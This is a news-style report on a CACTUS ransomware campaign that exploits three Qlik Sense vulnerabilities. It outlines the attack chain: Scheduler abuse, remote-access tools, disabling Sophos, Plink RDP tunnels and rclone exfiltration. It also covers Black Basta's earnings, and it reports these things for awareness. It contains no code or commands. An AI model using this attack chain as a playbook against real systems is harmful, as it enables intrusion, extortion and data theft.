Cybersecurity researchers at Arctic Wolf just uncovered a large-scale CACTUS ransomware campaign exploiting recently disclosed vulnerabilities in Qlik Sense. The latter is a cloud analytics and business intelligence platform.
This attack is another instance where threat actors have utilized Qlik Sense flaws for initial access, introducing a new layer of sophistication to ransomware tactics.
Exploiting Qlik Sense Vulnerabilities
The campaign, responding to “several instances” of exploitation, is believed to target three vulnerabilities disclosed in the past three months:
- CVE-2023-41265 (CVSS score: 9.9): An HTTP Request Tunneling flaw allowing remote attackers to elevate privileges and execute requests on the backend server.
- CVE-2023-41266 (CVSS score: 6.5): A path traversal vulnerability enabling unauthenticated remote attackers to send HTTP requests to unauthorized endpoints.
- CVE-2023-48365 (CVSS score: 9.9): An unauthenticated remote code execution flaw arising from improper validation of HTTP headers.
Notably, CVE-2023-48365 stems from an incomplete patch for CVE-2023-41265. The attacks involve exploiting these vulnerabilities, abusing the Qlik Sense Scheduler service, and subsequently deploying a range of additional tools to establish persistence and gain remote control.
Tools of Exploitation
The threat actors leverage the Qlik Sense Scheduler service to download tools such as ManageEngine Unified Endpoint Management and Security (UEMS), AnyDesk, and Plink. Shockingly, observed actions include uninstalling Sophos software, changing administrator account passwords, and creating RDP tunnels via Plink. The nefarious attack chains culminate in the deployment of CACTUS ransomware, accompanied by data exfiltration using rclone.
Despite governmental efforts to combat ransomware, the ransomware-as-a-service (RaaS) business model remains resilient. The report sheds light on the Black Basta ransomware group, estimating illegal profits exceeding $107 million in Bitcoin ransom payments. Intriguingly, Elliptic’s research uncovers ties between Black Basta and the now-defunct Conti group, as well as QakBot, implicating a complex web of cybercriminal affiliations.
As we get closer to the conclusion of 2023, it becomes apparent that this year has established unprecedented benchmarks in ransomware attacks. The initial six months alone experienced a remarkable 49% surge in publicly disclosed attacks, juxtaposed with the corresponding period in 2022. In other words, ransomware attacks in 2023 continue to prevail.